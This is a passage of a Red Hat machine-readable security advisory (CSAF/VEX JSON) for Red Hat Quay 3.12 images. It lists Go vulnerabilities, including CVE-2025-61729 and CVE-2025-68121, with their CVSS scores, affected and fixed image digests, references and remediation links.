"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
